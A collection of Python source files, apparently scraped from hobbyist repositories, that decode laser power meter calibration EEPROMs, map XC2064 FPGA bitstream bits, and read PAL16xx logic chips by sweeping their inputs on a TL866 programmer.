if not footer:
continue
yield fn, header, footer, reads
``` |
{
"source": "JohnDMcMaster/molectron",
"score": 3
} |
#### File: JohnDMcMaster/molectron/cm_lm.py
```python
import argparse
import struct
from uvscada.util import hexdump
import datetime
from lpmcal.parser import *
def read_str(buff):
"""
First field is number chars
"""
n = buff[0]
del buff[0]
ret = ""
for _i in range(n):
ret += chr(buff[0])
del buff[0]
return ret
def run(fn_in):
print("")
print("Reading", fn_in)
buff = bytearray(open(fn_in, "rb").read())
# Fixed size structure
buff = buff[0:0xC8]
"""
eeprom/lm/lm-100-qd-hd_j465.bin
00000000 01 06 30 30 35 31 31 36 00 4c 4d 2d 35 30 30 30 |..005116.LM-5000|
00000000 01 16 30 30 42 42 32 38 00 4c 4d 2d 31 30 20 51 |..00BB28.LM-10 Q|
00000000 01 16 31 36 34 00 00 00 00 4c 4d 2d 34 35 20 51 |..164....LM-45 Q|
00000000 01 16 31 39 5a 37 38 00 00 4c 4d 2d 31 30 20 51 |..19Z78..LM-10 Q|
00000000 01 16 32 32 31 34 36 33 00 4c 4d 2d 33 30 56 20 |..221463.LM-30V |
00000000 01 16 47 35 35 35 00 00 00 4c 4d 2d 31 30 20 51 |..G555...LM-10 Q|
00000000 01 16 4a 34 35 36 00 00 00 4c 4d 2d 31 30 30 20 |..J456...LM-100 |
00000000 01 16 43 30 34 30 00 00 00 4c 4d 2d 31 30 20 51 |..C040...LM-10 Q|
00000000 02 08 30 31 41 5a 37 34 00 4c 4d 2d 32 20 49 52 |..01AZ74.LM-2 IR|
00000000 02 08 30 35 30 30 48 30 00 4c 4d 2d 32 20 49 52 |..0500H0.LM-2 IR|
00000000 02 08 30 30 58 47 36 30 00 4c 4d 2d 32 20 53 49 |..00XG60.LM-2 SI|
00000000 02 08 31 34 33 33 44 30 00 4c 4d 2d 32 20 55 56 |..1433D0.LM-2 UV|
hmm these are weird
00000000 01 41 4a 4b 37 38 00 00 00 4c 4d 2d 50 31 30 46 |.AJK78...LM-P10F|
00000000 01 41 5a 4c 30 32 00 00 00 4c 4d 2d 50 31 30 46 |.AZL02...LM-P10F|
"""
print("Prefix1: %u" % read_u8(buff))
print("Prefix2: %u" % read_u8(buff))
print("Serial number: %s" % read_str_buff(buff, 7))
print("Model number: %s" % read_str_buff(buff, 17))
print("Part number: %s" % read_str_buff(buff, 13))
for i in range(10):
read_debug_unk32le(buff, "loop1-0x%02X" % i)
print("Some u8: %u" % read_u8(buff))
for i in range(30):
read_debug_unk32le(buff, "loop2-0x%02X" % i)
assert len(buff) == 0
def main():
parser = argparse.ArgumentParser(description='Decode')
parser.add_argument('fn_in', help='File name in')
args = parser.parse_args()
run(fn_in=args.fn_in)
if __name__ == "__main__":
main()
```
#### File: JohnDMcMaster/molectron/gentec_ps.py
```python
import argparse
import struct
from lpmcal.util import hexdump
import datetime
from lpmcal.parser import *
from lpmcal.util import tostr
def run(fn_in, verbose=False):
print("")
print("Reading", fn_in)
"""
00000000 00 00 00 00 d0 e8 00 58 00 0c 00 00 e4 d8 e4 d4 |.......X........|
00000010 00 c0 00 00 00 00 00 00 00 00 fe 00 00 4a e0 48 |.............J.H|
00000020 00 f8 00 00 fe 00 00 00 00 00 0a f4 8e 5c 70 60 |.............\p`|
00000030 ee 38 8a 60 4c 40 cc b4 c0 c4 08 5c 00 00 00 00 |.8.`L@.....\....|
00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000050 00 00 00 00 00 24 00 00 00 38 00 02 72 70 fe 4a |.....$...8..rp.J|
00000060 e6 04 fe 2a 74 28 fe 0a 34 6c fe 04 88 e0 fe 02 |...*t(..4l......|
00000070 d0 74 fc fe ea 04 fc fe 9c cc fc fa 80 50 fc fa |.t...........P..|
00000080 b2 80 fc f8 10 a0 00 00 00 00 00 00 00 00 00 00 |................|
00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000a0 30 38 00 86 ae 14 00 1c 28 f4 00 00 00 18 00 00 |08......(.......|
000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000c0 00 00 00 00 00 00 04 ac 7c 86 e0 8c fc fa 32 fc |........|.....2.|
000000d0 fc f8 36 60 fc fc 20 30 fc fe 8c 64 fc fc 20 20 |..6`.. 0...d.. |
000000e0 fe 00 00 00 fe 00 2e 3c fe 00 e8 50 fe 04 00 02 |.......<...P....|
000000f0 fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
"""
# floats: nope
if 0:
for ii in range(4):
buff = bytearray(open(fn_in, "rb").read())
# buff = buff[0x5C + ii:]
buff = buff[0xC6 + ii:]
hexdump(buff)
for i in range(10):
print("")
print(i)
# read_debug_u16be(buff)
# read_debug_u16be(buff)
peek_debug_fle(buff)
read_debug_fle(buff)
# As signed: -438 to -776
if 0:
buff = bytearray(open(fn_in, "rb").read())
buff = buff[0x5C + 2:]
hexdump(buff)
for i in range(10):
print("")
print(i)
read_debug_u16sbe(buff)
read_debug_u16sbe(buff)
if 1:
buff = bytearray(open(fn_in, "rb").read())
while True:
# read_debug_u16be(buff)
read_debug_u8(buff)
def main():
parser = argparse.ArgumentParser(description='Decode')
parser.add_argument('--verbose', action="store_true")
parser.add_argument('fn_in', help='File name in')
args = parser.parse_args()
run(fn_in=args.fn_in, verbose=args.verbose)
if __name__ == "__main__":
main()
```
#### File: molectron/lpmcal/parser.py
```python
import struct
def peek_u8(buff, off):
return buff[off]
def peek_u16le(buff, off):
return struct.unpack("<H", buff[off:off + 2])[0]
def peek_u32le(buff, off):
return struct.unpack("<I", buff[off:off + 4])[0]
def peek_fle(buff, off):
return struct.unpack("<f", buff[off:off + 4])[0]
def peek_u16be(buff, off):
return struct.unpack(">H", buff[off:off + 2])[0]
def peek_u32be(buff, off):
return struct.unpack(">I", buff[off:off + 4])[0]
def peek_fbe(buff, off):
return struct.unpack(">f", buff[off:off + 4])[0]
def read_buff(buff, n):
ret = buff[0:n]
del buff[0:n]
return ret
def read_u8(buff):
ret = buff[0]
del buff[0]
return ret
def read_u16le(buff):
ret = struct.unpack("<H", buff[0:2])[0]
del buff[0:2]
return ret
def read_u32le(buff):
ret = struct.unpack("<I", buff[0:4])[0]
del buff[0:4]
return ret
def read_fle(buff):
ret = struct.unpack("<f", buff[0:4])[0]
del buff[0:4]
return ret
def read_u16be(buff):
ret = struct.unpack(">H", buff[0:2])[0]
del buff[0:2]
return ret
def read_u16sbe(buff):
ret = struct.unpack(">h", buff[0:2])[0]
del buff[0:2]
return ret
def read_u32be(buff):
ret = struct.unpack(">I", buff[0:4])[0]
del buff[0:4]
return ret
def read_fbe(buff):
ret = struct.unpack(">f", buff[0:4])[0]
del buff[0:4]
return ret
def read_debug_unk32le(buff, label="unknown"):
f = peek_fle(buff, 0)
u32 = read_u32le(buff)
print(label + ":", u32, "/", "0x%08X" % u32, "/", f)
return u32
def read_debug_u8(buff, label="unknown"):
u8 = read_u8(buff)
print(label + ":", u8, "/", "0x%02X" % u8)
return u8
def read_debug_u16le(buff, label="unknown"):
u16 = read_u16le(buff)
print(label + ":", u16, "/", "0x%04X" % u16)
return u16
def read_debug_u32le(buff, label="unknown"):
u32 = read_u32le(buff)
print(label + ":", u32, "/", "0x%08X" % u32)
return u32
def read_debug_fle(buff, label="unknown"):
f = read_fle(buff)
print(label + ":", f)
return f
def read_debug_u16be(buff, label="unknown"):
u16 = read_u16be(buff)
print(label + ":", u16, "/", "0x%04X" % u16)
return u16
def read_debug_u16sbe(buff, label="unknown"):
u16 = read_u16sbe(buff)
print(label + ":", u16, "/", "0x%04X" % u16)
return u16
def read_debug_u32be(buff, label="unknown"):
u32 = read_u32be(buff)
print(label + ":", u32, "/", "0x%08X" % u32)
return u32
def read_debug_fbe(buff, label="unknown"):
f = read_fbe(buff)
print(label + ":", f)
return f
def peek_debug_fle(buff, label=""):
f = peek_fle(buff, 0)
print(label + ":", f)
return f
def peek_debug_unk32le(buff, label=""):
f = peek_fle(buff, 0)
u32 = peek_u32le(buff, 0)
print(label + ":", u32, "/", "0x%08X" % u32, "/", f)
def peek_debug_fbe(buff, label=""):
f = peek_fbe(buff, 0)
print(label + ":", f)
return f
def peek_debug_unk32be(buff, label=""):
f = peek_fbe(buff, 0)
u32 = peek_u32be(buff, 0)
print(label + ":", u32, "/", "0x%08X" % u32, "/", f)
def read_str_buff(buff, n):
ret = ""
for i in range(n):
chari = buff[i]
if not chari:
break
ret += chr(chari)
del buff[0:n]
return ret
def read_byte_buff(buff, n):
ret = buff[0:n]
del buff[0:n]
return ret
def read_struct(buff, format):
n = struct.calcsize(format)
ret = struct.unpack(format, buff[0:n])
del buff[0:n]
return ret
```
#### File: JohnDMcMaster/molectron/new_835.py
```python
import argparse
import struct
from lpmcal.util import hexdump
import datetime
from lpmcal.parser import *
from lpmcal.util import tostr
def led2str(buff):
"""
LED format: The eight bits in each byte indicate which segment of the
LED should be turned on (1) or off (0). The relation between the bit
position and the segment is as follows: (note that bit 2 controls the
decimal point to the bottom left of the digit)
--3--
| |
0 6
| |
--4--
| |
1 7
| |
2 --5--
For example, programming the serial number to D3h 3Bh 23h 5B would
display 'HELP' on startup.
"""
ret = ""
for n in buff:
# print(hex(n))
ret += {
0xC0: "1",
0x7A: "2",
0xF8: "3",
0xB9: "5",
0xBB: "6",
0xD9: "7",
0xEB: "8",
}[n]
return ret
def led2art(byte):
def bit(n):
if byte & (1 << n):
return {
0: "|",
1: "|",
2: ".",
3: "-",
4: "-",
5: "-",
6: "|",
7: "|",
}[n]
else:
return " "
return """\
%c%c%c%c%c
%c %c
%c %c
%c %c
%c%c%c%c%c
%c %c
%c %c
%c %c
%c %c%c%c%c%c""" % (
bit(3),
bit(3),
bit(3),
bit(3),
bit(3),
bit(0),
bit(6),
bit(0),
bit(6),
bit(0),
bit(6),
bit(5),
bit(5),
bit(5),
bit(5),
bit(5),
bit(1),
bit(7),
bit(1),
bit(7),
bit(1),
bit(7),
bit(2),
bit(5),
bit(5),
bit(5),
bit(5),
bit(5),
)
if 0:
print(led2art(0x7A))
import sys
sys.exit(1)
def decode_com(buff, verbose=False):
buff = buff[0:0x5D0]
verbose and hexdump(buff)
"""
"It carries 8K bytes of data, and shares its first 1K addresses with
an onboard static RAM HM6514
(that's why its first nonzero memory address is at $400)."
"""
for _i in range(0x400):
# assert read_u8(buff) == 0xFF
read_u8(buff)
print("Detector S/N:", led2str(read_buff(buff, 4)))
print("Attenuator S/N:", led2str(read_buff(buff, 4)))
read_debug_u16le(buff)
read_debug_u16le(buff)
read_debug_u16le(buff)
print("Start:", read_u8(buff) * 10, "nm")
print("End:", read_u8(buff) * 10, "nm")
def decode_a5(buff, verbose=False):
"""
http://redlum.xohp.pagesperso-orange.fr/electronics/Newport835.html#extra
Revision A5 EPROM format summary:
000h-3F0h: All FFh=255d
400h-403h: Detector serial number (in LED format)
404h-407h: Attenuator serial number (in LED format)
408h-40Ah: Unknown
40Bh-40Dh: Unknown
40Eh : Start wavelength (e.g. 28h=40d -> 400nm)
40Fh : End wavelength (e.g. 6Eh=110d -> 1100nm)
***A5/A6 diverges
410h-411h: Unknown
412h : Exponent bias for detector without attenuator
413h : Exponent bias for detector with attenuator
414h-565h: MSB of calibration coefficients (detector without
attenuator, followed by detector with attenuator, padded
with zeros)
566h-567h: Unknown
568h-6B9h: LSB of calibration coefficients (detector without
attenuator, followed by detector with attenuator, padded
with zeros). Start adress may vary.
"""
decode_com(buff, verbose=verbose)
read_debug_u16le(buff)
exp_wo_atten = read_u8(buff)
print("Exponent bias for detector without attenuator:", exp_wo_atten)
# "typically = 3 for SL and 2 for IR type det"
exp_w_atten = read_u8(buff)
print("Exponent bias for detector with attenuator:", exp_w_atten)
def decode_a6(buff, verbose=False):
"""
http://redlum.xohp.pagesperso-orange.fr/electronics/Newport835.html#extra
Revision A6 EPROM format summary:
000h-3F0h: All FFh=255d
400h-403h: Detector serial number (in LED format)
404h-407h: Attenuator serial number (in LED format)
408h-40Ah: Unknown
40Bh-40Dh: Unknown; these bytes repeat the 3 previous ones and it thus seems likely
that these two triples are associated with detector and attenuator, resp.
40Eh : Start wavelength (e.g. 28h=40d -> 400nm)
40Fh : End wavelength (e.g. 6Eh=110d -> 1100nm)
***A5/A6 diverges
410h-411h: Unknown
416h : Exponent bias for detector without attenuator (typically = 0)
417h : Exponent bias for detector with attenuator (typically = 3 for SL and 2 for IR type det)
418h-...h: MSB of calibration coefficients (detector without
attenuator, followed by detector with attenuator, padded
with zeros)
506h-...: LSB of calibration coefficients (detector without
attenuator, followed by detector with attenuator, padded
with zeros). Start adress may vary, for example it is
often equal to 540h.
"""
decode_com(buff, verbose=verbose)
read_debug_u16le(buff)
read_debug_u16le(buff)
# ***A5/A6 diverges
# "typically = 0"
# hmm these seem too large
# Exponent bias for detector without attenuator: 7
# Exponent bias for detector with attenuator: 32
exp_wo_atten = read_u8(buff)
print("Exponent bias for detector without attenuator:", exp_wo_atten)
# "typically = 3 for SL and 2 for IR type det"
exp_w_atten = read_u8(buff)
print("Exponent bias for detector with attenuator:", exp_w_atten)
"""
Calibration coefficient format: The calibration coefficients are 16
bit floating point numbers. The two most significant bits, when added
to the exponent bias (offset 412h and 413h), are the base 10 exponent.
The remaining least significant 14 bits are the fractional mantissa.
Interpreting the 14 LSB as a binary number B (0 to 16383), the
relationship between the detector responsivity (R) at a given
wavelength and the calibration coefficient is as follows:
R = (B/16384) / 10^(E+bias)
For example, assuming that exponent bias is 0, here are some sample
responsivity and corresponding 16 bit calibration coefficients:
500.0 mA/W = 2000h
250.0 mA/W = 1000h
125.0 mA/W = 0800h
12.50 mA/W = 4800h
1.25 mA/W = 8800h
125.0 uA/W = C800h
Note that exponents less than zero have not been tested. The maximum
responsivity for positive exponents is:
0.9999 A/W = 3FFFh
"""
verbose and hexdump(buff)
# read_debug_u32(buff)
caln = 0x8E
c1s = []
c2s = []
c3s = []
for i in range(caln):
c1s.append(read_u8(buff))
verbose and hexdump(buff)
for i in range(caln):
c2s.append(read_u8(buff))
for i in range(12):
assert read_u8(buff) == 0
for i in range(caln):
c3s.append(read_u8(buff))
print("Cal table")
for c1, c2, c3 in zip(c1s, c2s, c3s):
exp = c1 >> 6
assert c2 == 0
n14 = ((c1 & 0x3F) << 8) + c3
val = (n14 / 16384.) / (10**(exp + exp_wo_atten))
if verbose:
print(" cs", c1, c2, c3)
print(" %0.3f" % val)
read_debug_u16le(buff)
def run(fn_in, version=None, verbose=False):
print("")
print("Reading", fn_in)
buff = bytearray(open(fn_in, "rb").read())
# TODO: figure out a better sanity check here
assert len(buff) >= 0x5D0
if version is None:
"""
Unfortunately this string field is not in 835 dumps
00000200 01 38 31 38 2d 49 52 00 00 00 00 00 00 00 00 00 |.818-IR.........|
"""
if len(buff) == 2048:
raise Exception("Bare sensor cal? FIXME")
"""
00000000 52 45 56 20 41 31 20 20 20 53 4f 46 54 57 41 52 |REV A1 SOFTWAR|
00000010 45 20 42 59 20 54 45 44 20 48 55 42 45 52 9b 9c |E BY <NAME>..|
"""
if len(buff) == 4096:
raise Exception("GPIB ROM? Does not contain cal data")
assert len(
buff) == 8 * 1024, "Need full firmware for auto detect version"
# Firmware isn't part of the cal
# But all dumps so far include it
"""
000006b0 00 00 00 00 00 00 00 00 00 00 ff ff 4c 50 4d 20 |............LPM |
000006c0 52 45 56 20 41 35 20 20 20 eb c0 7a f8 d1 b9 bb |REV A5 ..z....|
"""
check_a5 = tostr(buff[0x6bc:0x6c6])
"""
00000660 ff ff ff ff ff ff ff ff 4c 50 4d 20 52 45 56 20 |........LPM REV |
00000670 41 36 20 20 20 eb c0 7a f8 d1 b9 bb c8 fb d9 00 |A6 ..z........|
"""
check_a6 = tostr(buff[0x668:0x672])
if check_a5 == "LPM REV A5":
version = "A5"
elif check_a6 == "LPM REV A6":
version = "A6"
else:
hexdump(check_a5)
hexdump(check_a6)
assert 0, "Failed to detect rev (wrong format?)"
print("Decoding version", version)
if version == "A5":
decode_a5(buff, verbose=verbose)
elif version == "A6":
decode_a6(buff, verbose=verbose)
else:
assert 0, ("Failed to detect rev (wrong format?)", version)
def main():
parser = argparse.ArgumentParser(description='Decode')
parser.add_argument('--verbose', action="store_true")
parser.add_argument('--version', default=None)
parser.add_argument('fn_in', help='File name in')
args = parser.parse_args()
run(fn_in=args.fn_in, version=args.version, verbose=args.verbose)
if __name__ == "__main__":
main()
``` |
{
"source": "JohnDMcMaster/p2064",
"score": 2
} |
#### File: fuzzer/clb_lut/theorem.py
```python
lut_r2off = {
'A': 0x3e,
'B': 0x36,
'C': 0x2e,
# +
'D': 0x25,
'E': 0x1d,
'F': 0x15,
# +
'G': 0x0c,
'H': 0x04,
}
# Potential vs observed
# LUT_NOFF = 0x08
LUT_NOFF = 0x02
lut_c2frame = {
'A': 0x8b,
'B': 0x79,
'C': 0x67,
# +
'D': 0x53,
'E': 0x41,
'F': 0x2f,
# +
'G': 0x1b,
'H': 0x09,
}
LUT_NFRAMES = 0x12
def load_bits(fin):
ret = set()
for l in fin:
# bit_04_0f
_prefix, wordi, offi = l.split('_')
ret.add((int(wordi, 16), int(offi, 16)))
return ret
def load_design(fin):
ret = {}
fin.readline()
for l in fin:
k, v = l.split(',')
v = int(v, 16)
ret[k] = v
return ret
def run(bitf, designf, fout):
bitdb = load_bits(bitf)
designdb = load_design(designf)
for rowi, row in enumerate('ABCDEFGH'):
for coli, col in enumerate('ABCDEFGH'):
'''
seg 00020500_000
bit 00_22
...
bit 35_52
bit 35_53
tag CLB.SLICE_X0.C5FF.ZINI 1
tag CLB.SLICE_X0.C5FF.ZRST 0
tag CLB.SLICE_X0.CLKINV 0
'''
fout.write('seg %02X%02X\n' % (rowi, coli))
base_frame = lut_c2frame[col]
base_off = lut_r2off[row]
for framei in xrange(LUT_NFRAMES):
frame = base_frame + framei
for offi in xrange(LUT_NOFF):
off = base_off + offi
if (frame, off) in bitdb:
fout.write('bit %02X_%02X\n' % (framei, offi))
val = designdb[row + col]
for maski in xrange(16):
expect = 1 ^ int(bool((val & (1 << maski))))
fout.write('tag CLB.LUT[%02X] %d\n' % (maski, expect))
def main():
import argparse
parser = argparse.ArgumentParser(
description=
'Find bit locations'
)
parser.add_argument('--verbose', type=int, help='')
parser.add_argument('bits', help='.bits input file')
parser.add_argument('design', help='design.txt input file')
parser.add_argument('segdata', help='segadata output file')
args = parser.parse_args()
run(open(args.bits, 'r'), open(args.design, 'r'), open(args.segdata, 'w'))
if __name__ == '__main__':
main()
```
#### File: p2064/xc2k/bit2bits.py
```python
from xc2k import parser
from xc2k import container
def bit2bits(fin, fout, format='bit'):
bit2bitsf(open(fin, 'r'), open(fout, 'w'))
def bit2bitsf(fin, fout, format='bit'):
p = parser.Parser(container.getbits(fin, format))
for framei, frame in enumerate(p.frames()):
for biti, bit in enumerate(frame['payload']):
# self.nframes = {'xc2018': 196, 'xc2064': 160}[dev]
# self.frame_bits = {'xc2018': 87, 'xc2064': 71}[dev]
if bit:
fout.write('bit_%02x_%02x\n' % (framei, biti))
```
#### File: p2064/xc2k/container.py
```python
import bitstring
def revbits8(n):
return int('{:08b}'.format(n)[::-1], 2)
def revbits4(n):
return int('{:04b}'.format(n)[::-1], 2)
def revnib(n):
return ((n & 0xF) << 4) | ((n >> 4) & 0xF)
def munge(n):
return (revbits4(n & 0xF) << 4) | revbits4((n >> 4) & 0xF)
def getbits_bin(f):
return bitstring.ConstBitStream(bytes=f.read())
def getbits_bit(f):
# bit w/ header
buff = f.read()
buff = buff[0x76:]
return bitstring.ConstBitStream(bytes=buff)
def getbits_rom(f):
# random rom file they gave me
buff = bytearray()
for b in f.read():
# Reverse bits, swap nibbles
buff += chr(munge(ord(b)))
return bitstring.ConstBitStream(bytes=buff)
def getbits(f, format='bit'):
bits = {
'bin': getbits_bin,
'bit': getbits_bit,
'rom': getbits_rom,
}[format](f)
return bits
``` |
{
"source": "JohnDMcMaster/pal866",
"score": 2
} |
#### File: JohnDMcMaster/pal866/jl2eprom.py
```python
import binascii
import json
import time
def run(fnin, fnout=None, verbose=False):
if fnout is None:
fnout = fnin.replace(".jl", ".bin")
assert fnout != fnin, "Couldn't auto-name output file"
fin = open(fnin, "r")
meta = json.loads(fin.readline())
# Possibly could give a --force option
assert meta["part"] == "PAL16L8", "Only non-registered parts supported"
assert len(meta["pins"]["D"]) == 8
buff = bytearray(meta["data_words"])
for l in fin:
addr, word_comb, word_ff = json.loads(l)
assert word_ff is None
buff[addr] = word_comb
open(fnout, "wb").write(buff)
def main():
import argparse
parser = argparse.ArgumentParser(description='Read PAL device')
parser.add_argument("--verbose", action="store_true")
parser.add_argument("fnin")
parser.add_argument("fnout", nargs='?')
args = parser.parse_args()
run(fnin=args.fnin, fnout=args.fnout, verbose=args.verbose)
if __name__ == "__main__":
main()
```
#### File: JohnDMcMaster/pal866/pal16xx.py
```python
from otl866 import bitbang, util
from otl866 import aclient
import binascii
import json
import time
# ZIF20 pin 1 indexed to ezzif 40 pin 0 indexed
dip20_to_zif_ = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, \
31, 32, 33, 34, 35, 36, 37, 38, 39, 40]
dip20_to_zif = dict([(i + 1, x - 1) for i, x in enumerate(dip20_to_zif_)])
"""
Each state
-Parent state(s)
-Non-self child states for each possible input both clocked and unlocked
"""
"""
class State:
def __init__(self):
# (input, output, isclk) to state
self.parents = {}
# (input, output, isclk) to state
self.children = {}
def add_closed_states(closed, tests):
ret = set()
for (addr, word_comb, word_clk) in tests:
closed.add((addr, word_comb, False))
closed.add((addr, word_clk, True))
return ret
def add_open_states(open, tests):
for (addr, word_comb, word_clk) in tests:
pass
"""
class PAL16XXReader:
def __init__(self, tl, part, input_pins=[]):
assert part in ("PAL16L8", "PAL16R4", "PAL16R6", "PAL16R8")
self.part = part
if self.part == "PAL16L8":
self.P_CLK = None
self.P_OEn = None
self.I_LINES = [1, 2, 3, 4, 5, 6, 7, 8, 9, 11]
# 13-18 are I/O
self.O_LINES = [12, 19]
self.IO_LINES = []
# Manually specify input pins
if input_pins is not None:
for pin in input_pins:
assert 13 <= pin <= 18
for pin in range(13, 19):
if pin in input_pins:
self.I_LINES.append(pin)
else:
self.O_LINES.append(pin)
# Otherwise try to guess t
else:
self.IO_LINES = [13, 14, 15, 16, 17, 18]
else:
self.P_CLK = 1
self.P_OEn = 11
# 15 bit address => A14 max
# 27C128
self.I_LINES = [2, 3, 4, 5, 6, 7, 8, 9]
# LSB to MSB
self.O_LINES = [12, 13, 14, 15, 16, 17, 18, 19]
self.I_LINES_base = sorted(self.I_LINES)
self.O_LINES_base = sorted(self.O_LINES)
self.I_LINES = self.I_LINES_base
self.O_LINES = self.O_LINES_base
print("I_LINES: %s" % (self.I_LINES,))
print("O_LINES: %s" % (self.O_LINES,))
print("IO_LINES: %s" % (self.IO_LINES,))
self.P_VCC = 20
self.P_GND = 10
self.tl = tl
self.reset()
def dip20s_to_zif(self, pins20):
return sum([1 << dip20_to_zif[x] for x in pins20])
def addr_to_pin20s(self, addr):
"""
Return pins that should be set high
"""
ret = []
for biti, pin in enumerate(self.I_LINES):
if addr & (1 << biti):
ret.append(pin)
return ret
def ez2data(self, zif_val):
'''
Given socket state as integer mask, return the current data byte on data bus
'''
# LSB to MSB
ret = 0
for biti, pin20 in enumerate(self.O_LINES):
# print("check d", zif_val, biti, pin20)
if (1 << dip20_to_zif[pin20]) & zif_val:
ret |= 1 << biti
# print("ez2data: 0x%010X => 0x%02X" % (zif_val, ret))
return ret
def inputs_p20(self):
ret = self.I_LINES
if self.P_CLK is not None:
ret += [self.P_CLK]
if self.P_OEn is not None:
ret += [self.P_OEn]
return ret
def reset(self):
self.tl.vdd_en(False)
self.tl.gnd_pins(0)
# All high impedance by default
tristate = 0xFFFFFFFFFF
for pin in self.inputs_p20():
tristate ^= 1 << dip20_to_zif[pin]
self.tl.io_tri(tristate)
# Set voltages
self.tl.gnd_pins(self.dip20s_to_zif([self.P_GND]))
self.tl.vdd_pins(self.dip20s_to_zif([self.P_VCC]))
self.tl.vdd_volt(aclient.VDD_51)
# Set all pins low
self.tl.io_w(0)
# self.tl.io_w(pin20s_to_ez([P_CLK, P_OEn]))
self.tl.vdd_en()
def quick_reset(self):
"""
# Cut power, ground rail
self.tl.vdd_pins(0)
self.tl.vdd_en(False)
self.tl.io_w(0)
self.tl.io_tri(0)
self.tl.gnd_pins(0xFFFFFFFFFF)
time.sleep(0.1)
self.tl.io_tri(0xFFFFFFFFFF)
self.tl.gnd_pins(0)
self.reset()
"""
# Cut power, ground rail briefly
self.tl.vdd_pins(0)
self.tl.gnd_pins(self.dip20s_to_zif([self.P_VCC, self.P_GND]))
self.tl.gnd_pins(self.dip20s_to_zif([self.P_GND]))
self.tl.vdd_pins(self.dip20s_to_zif([self.P_VCC]))
def sweep_combclk_io(self, clk):
"""
Read every address and return the resulting data
Static value + dynamic value
"Registers are triggered on the high going edge"
"""
print("Solver: sweep_combclk_io()")
yield {"solver": "sweep_combclk_io"}
for addr in range(self.words()):
# for addr in [0xCA]:
print("Addr 0x%04X / 0x%04X" % (addr, self.words()))
# print("pass 1")
# Clock low, OEn low
self.tl.io_w(self.dip20s_to_zif(self.addr_to_pin20s(addr)))
word_comb = self.ez2data(self.tl.io_r())
print(" comb: 0x%02X" % word_comb)
if clk:
assert self.P_CLK is not None
# print("pass 2")
# Clock high, OEn low
self.tl.io_w(self.dip20s_to_zif([self.P_CLK] + self.addr_to_pin20s(addr)))
word_clk = self.ez2data(self.tl.io_r())
print(" clk: 0x%02X" % word_clk)
else:
word_clk = None
yield {"A": addr, "D_comb": word_comb, "D_clk": word_clk}
def setup_io(self, opins=[]):
self.I_LINES = list(self.I_LINES_base)
self.O_LINES = list(self.O_LINES_base)
for pin in self.IO_LINES:
if pin in opins:
self.O_LINES.append(pin)
else:
self.I_LINES.append(pin)
self.I_LINES = sorted(self.I_LINES)
self.O_LINES = sorted(self.O_LINES)
def iomap(self):
"""
Return a string in pin order
I: input
O: output
Z: tristate (RFU)
P: power
G: ground
C: clock
0/1: fixed value
"""
ret = list("?" * 20)
ret[self.P_VCC - 1] = "P"
ret[self.P_GND - 1] = "G"
for pin in self.I_LINES:
ret[pin - 1] = "I"
for pin in self.O_LINES:
ret[pin - 1] = "O"
if self.P_CLK is not None:
ret[self.P_CLK - 1] = "C"
if self.P_OEn is not None:
ret[self.P_OEn - 1] = "0"
assert "?" not in ret
return "".join(ret)
def sweep_combclk_ioio(self):
"""
Read every address and return the resulting data
There are 6 unknown I/O lines
Solve these by keeping one as output each pass and treating others as inputs
TL866 has 1.2k resistor on ZIF that should keep chip safe w/ bus contention
"""
print("Solver: sweep_combclk_ioio()")
yield {"solver": "sweep_combclk_ioio"}
for this_opini, this_opin in enumerate(self.IO_LINES):
print("")
self.setup_io(opins=[this_opin])
iomap = self.iomap()
print("io %u / %u, io %s" % (this_opini + 1, len(self.IO_LINES), iomap))
for addr in range(self.words()):
# for addr in [0xCA]:
print("Addr 0x%04X / 0x%04X" % (addr, self.words()))
# print("pass 1")
# Clock low, OEn low
self.tl.io_w(self.dip20s_to_zif(self.addr_to_pin20s(addr)))
word_comb = self.ez2data(self.tl.io_r())
print(" comb: 0x%02X" % word_comb)
yield {"A": addr, "D_comb": word_comb, "io": iomap}
def wr_clk(self, addr, clk=False):
# clk = not clk
if clk:
self.tl.io_w(self.dip20s_to_zif([self.P_CLK] + self.addr_to_pin20s(addr)))
else:
self.tl.io_w(self.dip20s_to_zif(self.addr_to_pin20s(addr)))
return self.ez2data(self.tl.io_r())
def state_reset(self, parents):
"""Reset if FFs are in target state"""
iref, oref = parents[-1]
now = self.wr_clk(iref)
print(" state_reset(): wanted 0x%02X => 0x%02X, got 0x%02X" % (iref, oref, now))
if now == oref:
return
print(" state_reset() running")
self.quick_reset()
# Now walk state to get back to original
for stepi, (iref, oref) in enumerate(parents):
# Power on
if stepi == 0:
out = self.wr_clk(iref, False)
else:
out = self.wr_clk(iref, True)
print(" state_reset(): %u 0x%02X => 0x%02X, got 0x%02X" % (stepi, iref, oref, out))
if oref != out:
print(parents)
print(stepi, iref, oref)
raise Exception("Failed to recreate state")
def recursive_solver(self, found_states=set(), parents=[]):
# (input, output)
ret = []
self.reset()
if not parents:
print("Solver: recursive_solver()")
yield {"solver": "recursive"}
# Baseline power on at address 0
parents.append((0, self.wr_clk(0, False)))
print("Sweeping, %u found states" % len(found_states))
print("Parents (%u)" % len(parents))
for parent in parents:
print(" ", parent)
pending_recurse = {}
if 0 and len(parents) == 1:
itr = [0xA7]
else:
itr = range(self.words())
for addr in itr:
print("Addr 0x%02X" % (addr,))
self.state_reset(parents)
word_comb = self.wr_clk(addr, False)
word_clkp = self.wr_clk(addr, True)
# Falling clock edge shouldn't change logic
word_clkn = self.wr_clk(addr, False)
print(" addr 0x%02X: comb 0x%02X, clkp 0x%02X, clkn 0x%02X, change %u" % (addr, word_comb, word_clkp, word_clkn, word_comb != word_clkp))
if word_clkp != word_clkn:
print("")
print("")
print("")
print("Fail")
while True:
print("")
time.sleep(1)
word_comb = self.wr_clk(addr, False)
time.sleep(1)
word_clkp = self.wr_clk(addr, True)
time.sleep(1)
# Falling clock edge shouldn't change logic
word_clkn = self.wr_clk(addr, False)
print(" addr 0x%02X: comb 0x%02X, clkp 0x%02X, clkn 0x%02X, change %u" % (addr, word_comb, word_clkp, word_clkn, word_comb != word_clkp))
raise Exception("Bad clock transition")
ret.append({"A": addr, "D_comb": word_comb, "D_clk": word_clkp})
if word_clkp not in found_states:
found_states.add(word_clkp)
pending_recurse[word_clkp] = addr
print("Checking %u pending recursions" % len(pending_recurse))
for iteri, (word_clk, addr) in enumerate(pending_recurse.items()):
print("")
